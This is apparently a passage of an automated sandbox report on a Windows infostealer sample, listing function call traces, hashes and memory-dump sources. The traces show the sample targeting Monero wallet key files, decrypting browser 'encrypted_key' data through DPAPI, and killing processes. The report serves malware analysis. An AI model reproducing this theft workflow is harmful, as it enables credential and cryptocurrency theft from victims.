                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcesswsprintf
                          • String ID: %hs
                          • API String ID: 769748085-2783943728
                          • Opcode ID: 6db84d7176fe3bcb405f59e6e3544fc67dc2542d6aae125daf146e5906e3e1e5
                          • Instruction ID: 56b0f28a0e0127830df56161d3fd325737414d582ce3caddea1fbfc95a0de4b9
                          • Opcode Fuzzy Hash: 6db84d7176fe3bcb405f59e6e3544fc67dc2542d6aae125daf146e5906e3e1e5
                          • Instruction Fuzzy Hash: D7E08CB0A40308BBD720DB98DC0AE69BBB8EB04702F004194FE09C7390DA719E019BB6
                          Function 00AEA260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                            • Part of subcall function 00AFA9B0: lstrlen.KERNEL32(?,017988E8,?,\Monero\wallet.keys,00B00E17), ref: 00AFA9C5
                            • Part of subcall function 00AFA9B0: lstrcpy.KERNEL32(00000000), ref: 00AFAA04
                            • Part of subcall function 00AFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00AFAA12
                            • Part of subcall function 00AFA8A0: lstrcpy.KERNEL32(?,00B00E17), ref: 00AFA905
                            • Part of subcall function 00AF8B60: GetSystemTime.KERNEL32(00B00E1A,01799AF0,00B005AE,?,?,00AE13F9,?,0000001A,00B00E1A,00000000,?,017988E8,?,\Monero\wallet.keys,00B00E17), ref: 00AF8B86
                            • Part of subcall function 00AFA920: lstrcpy.KERNEL32(00000000,?), ref: 00AFA972
                            • Part of subcall function 00AFA920: lstrcat.KERNEL32(00000000), ref: 00AFA982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00AEA2E1
                          • lstrlen.KERNEL32(00000000,00000000), ref: 00AEA3FF
                          • lstrlen.KERNEL32(00000000), ref: 00AEA6BC
                            • Part of subcall function 00AFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00AFA7E6
                          • DeleteFileA.KERNEL32(00000000), ref: 00AEA743
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: 1ffc8a4138019577c2d057a9012230f38f871b7575d1c03afcb5189faabf6061
                          • Instruction ID: aa9b5091eb71fc3483dd6bd599a6de812c537d63e37d1ee516c0313c9400a840
                          • Opcode Fuzzy Hash: 1ffc8a4138019577c2d057a9012230f38f871b7575d1c03afcb5189faabf6061
                          • Instruction Fuzzy Hash: 1CE1D2B291010C9BDB15FBE4DD91DFE7338AF24340F508569F61AB6091EF706A49CBA2
                          Function 00AED400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                            • Part of subcall function 00AFA9B0: lstrlen.KERNEL32(?,017988E8,?,\Monero\wallet.keys,00B00E17), ref: 00AFA9C5
                            • Part of subcall function 00AFA9B0: lstrcpy.KERNEL32(00000000), ref: 00AFAA04
                            • Part of subcall function 00AFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00AFAA12
                            • Part of subcall function 00AFA8A0: lstrcpy.KERNEL32(?,00B00E17), ref: 00AFA905
                            • Part of subcall function 00AF8B60: GetSystemTime.KERNEL32(00B00E1A,01799AF0,00B005AE,?,?,00AE13F9,?,0000001A,00B00E1A,00000000,?,017988E8,?,\Monero\wallet.keys,00B00E17), ref: 00AF8B86
                            • Part of subcall function 00AFA920: lstrcpy.KERNEL32(00000000,?), ref: 00AFA972
                            • Part of subcall function 00AFA920: lstrcat.KERNEL32(00000000), ref: 00AFA982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00AED481
                          • lstrlen.KERNEL32(00000000), ref: 00AED698
                          • lstrlen.KERNEL32(00000000), ref: 00AED6AC
                          • DeleteFileA.KERNEL32(00000000), ref: 00AED72B
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: b774bdb05e189a2b0633a463fe7eeeb7e318ae5ed97e3fdfb5d6c7cf3e05ebea
                          • Instruction ID: 152f224f4f27a08ba03fbe350877a69603ba36cd88aad63df9c073953dd1f797
                          • Opcode Fuzzy Hash: b774bdb05e189a2b0633a463fe7eeeb7e318ae5ed97e3fdfb5d6c7cf3e05ebea
                          • Instruction Fuzzy Hash: 889106B191010C9BCB14FBE4DE91DFE7338AF24340F508569F60BA6191EF746A09CBA2
                          Function 00AED780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                            • Part of subcall function 00AFA9B0: lstrlen.KERNEL32(?,017988E8,?,\Monero\wallet.keys,00B00E17), ref: 00AFA9C5
                            • Part of subcall function 00AFA9B0: lstrcpy.KERNEL32(00000000), ref: 00AFAA04
                            • Part of subcall function 00AFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00AFAA12
                            • Part of subcall function 00AFA8A0: lstrcpy.KERNEL32(?,00B00E17), ref: 00AFA905
                            • Part of subcall function 00AF8B60: GetSystemTime.KERNEL32(00B00E1A,01799AF0,00B005AE,?,?,00AE13F9,?,0000001A,00B00E1A,00000000,?,017988E8,?,\Monero\wallet.keys,00B00E17), ref: 00AF8B86
                            • Part of subcall function 00AFA920: lstrcpy.KERNEL32(00000000,?), ref: 00AFA972
                            • Part of subcall function 00AFA920: lstrcat.KERNEL32(00000000), ref: 00AFA982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00AED801
                          • lstrlen.KERNEL32(00000000), ref: 00AED99F
                          • lstrlen.KERNEL32(00000000), ref: 00AED9B3
                          • DeleteFileA.KERNEL32(00000000), ref: 00AEDA32
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: 19cca9df5405049a0d42cf0cd0fbf17b4f175db4dab2fb67b0743278f52bb523
                          • Instruction ID: cdf164c517c706e486fcdbce80e55c0ca08019669727bbd3e8beb5a5690c039c
                          • Opcode Fuzzy Hash: 19cca9df5405049a0d42cf0cd0fbf17b4f175db4dab2fb67b0743278f52bb523
                          • Instruction Fuzzy Hash: 6A81D3B291010C9BDB14FBE4DE95DFE7338AF24340F504569F60BA6191EF746A09CBA2
                          Function 00AEF4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00AFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00AFA7E6
                            • Part of subcall function 00AE99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00AE99EC
                            • Part of subcall function 00AE99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00AE9A11
                            • Part of subcall function 00AE99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00AE9A31
                            • Part of subcall function 00AE99C0: ReadFile.KERNEL32(000000FF,?,00000000,00AE148F,00000000), ref: 00AE9A5A
                            • Part of subcall function 00AE99C0: LocalFree.KERNEL32(00AE148F), ref: 00AE9A90
                            • Part of subcall function 00AE99C0: CloseHandle.KERNEL32(000000FF), ref: 00AE9A9A
                            • Part of subcall function 00AF8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00AF8E52
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                            • Part of subcall function 00AFA9B0: lstrlen.KERNEL32(?,017988E8,?,\Monero\wallet.keys,00B00E17), ref: 00AFA9C5
                            • Part of subcall function 00AFA9B0: lstrcpy.KERNEL32(00000000), ref: 00AFAA04
                            • Part of subcall function 00AFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00AFAA12
                            • Part of subcall function 00AFA8A0: lstrcpy.KERNEL32(?,00B00E17), ref: 00AFA905
                            • Part of subcall function 00AFA920: lstrcpy.KERNEL32(00000000,?), ref: 00AFA972
                            • Part of subcall function 00AFA920: lstrcat.KERNEL32(00000000), ref: 00AFA982
                          • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00B01580,00B00D92), ref: 00AEF54C
                          • lstrlen.KERNEL32(00000000), ref: 00AEF56B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                          • String ID: ^userContextId=4294967295$moz-extension+++
                          • API String ID: 998311485-3310892237
                          • Opcode ID: 2f303673eba83bb58e5ee9d2a62180d548242015db4ee14d3c09cf4c64b47a53
                          • Instruction ID: 6918a9948ab20bb0d484442458fa458656568576a16192721b9cb197064a6623
                          • Opcode Fuzzy Hash: 2f303673eba83bb58e5ee9d2a62180d548242015db4ee14d3c09cf4c64b47a53
                          • Instruction Fuzzy Hash: 625123B1D1010CABDB04FBE4DD92DFD7778AF64340F408528F91AA7195EE746A09CBA2
                          Function 00AF3560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID:
                          • API String ID: 367037083-0
                          • Opcode ID: 035efdaa07bce1fef9be293ceabdc9978f6b46f45a8b2a7188579a31deb40018
                          • Instruction ID: bbabe5b11859a9c0bf24146f26859b71d99ad5fd84549795344b82c49a196cab
                          • Opcode Fuzzy Hash: 035efdaa07bce1fef9be293ceabdc9978f6b46f45a8b2a7188579a31deb40018
                          • Instruction Fuzzy Hash: 1E412FB2D1020DAFDF14EFE4D945AFEBBB4AB54304F008018F616A6290DB75AA05CBA1
                          Function 00AE9CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                            • Part of subcall function 00AE99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00AE99EC
                            • Part of subcall function 00AE99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00AE9A11
                            • Part of subcall function 00AE99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00AE9A31
                            • Part of subcall function 00AE99C0: ReadFile.KERNEL32(000000FF,?,00000000,00AE148F,00000000), ref: 00AE9A5A
                            • Part of subcall function 00AE99C0: LocalFree.KERNEL32(00AE148F), ref: 00AE9A90
                            • Part of subcall function 00AE99C0: CloseHandle.KERNEL32(000000FF), ref: 00AE9A9A
                            • Part of subcall function 00AF8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00AF8E52
                          • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00AE9D39
                            • Part of subcall function 00AE9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00AE4EEE,00000000,00000000), ref: 00AE9AEF
                            • Part of subcall function 00AE9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00AE4EEE,00000000,?), ref: 00AE9B01
                            • Part of subcall function 00AE9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00AE4EEE,00000000,00000000), ref: 00AE9B2A
                            • Part of subcall function 00AE9AC0: LocalFree.KERNEL32(?,?,?,?,00AE4EEE,00000000,?), ref: 00AE9B3F
                            • Part of subcall function 00AE9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00AE9B84
                            • Part of subcall function 00AE9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00AE9BA3
                            • Part of subcall function 00AE9B60: LocalFree.KERNEL32(?), ref: 00AE9BD3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                          • String ID: $"encrypted_key":"$DPAPI
                          • API String ID: 2100535398-738592651
                          • Opcode ID: 756d417b3795ae0428a8ef51f8d6dc1ebf9005910a6281870d51d7eed1a793a4
                          • Instruction ID: fb4fff1df3818c9160bdbc04bc0b1efc3e13d772e194a4b65fdfbeb3ab03cf69
                          • Opcode Fuzzy Hash: 756d417b3795ae0428a8ef51f8d6dc1ebf9005910a6281870d51d7eed1a793a4
                          • Instruction Fuzzy Hash: 58314DB6D1021DABCF14EBE5DD85AEFB7B8AF48304F144558EA05A7241EB349A04CBA1
                          Function 00AF94D0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 00AF94EB
                            • Part of subcall function 00AF8D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00AF951E,00000000), ref: 00AF8D5B
                            • Part of subcall function 00AF8D50: RtlAllocateHeap.NTDLL(00000000), ref: 00AF8D62
                            • Part of subcall function 00AF8D50: wsprintfW.USER32 ref: 00AF8D78
                          • OpenProcess.KERNEL32(00001001,00000000,?), ref: 00AF95AB
                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 00AF95C9
                          • CloseHandle.KERNEL32(00000000), ref: 00AF95D6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                          • String ID:
                          • API String ID: 3729781310-0
                          • Opcode ID: 72e4d99a9df5aaeb62719306000f2be6335209edc001fe08344771f50d9c731b
                          • Instruction ID: 221e8211395f2cd91ba8732f4882e948811f2e3894b1c81b25c7c3e85960a60e
                          • Opcode Fuzzy Hash: 72e4d99a9df5aaeb62719306000f2be6335209edc001fe08344771f50d9c731b
                          • Instruction Fuzzy Hash: 6D310CB1A0031C9FDB15DBE4CD49BEEB778EF54700F104459F60AAB284DB74AA89CB52
                          Function 00AF92E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileA.KERNEL32(00AF3AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00AF3AEE,?), ref: 00AF92FC
                          • GetFileSizeEx.KERNEL32(000000FF,00AF3AEE), ref: 00AF9319
                          • CloseHandle.KERNEL32(000000FF), ref: 00AF9327
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
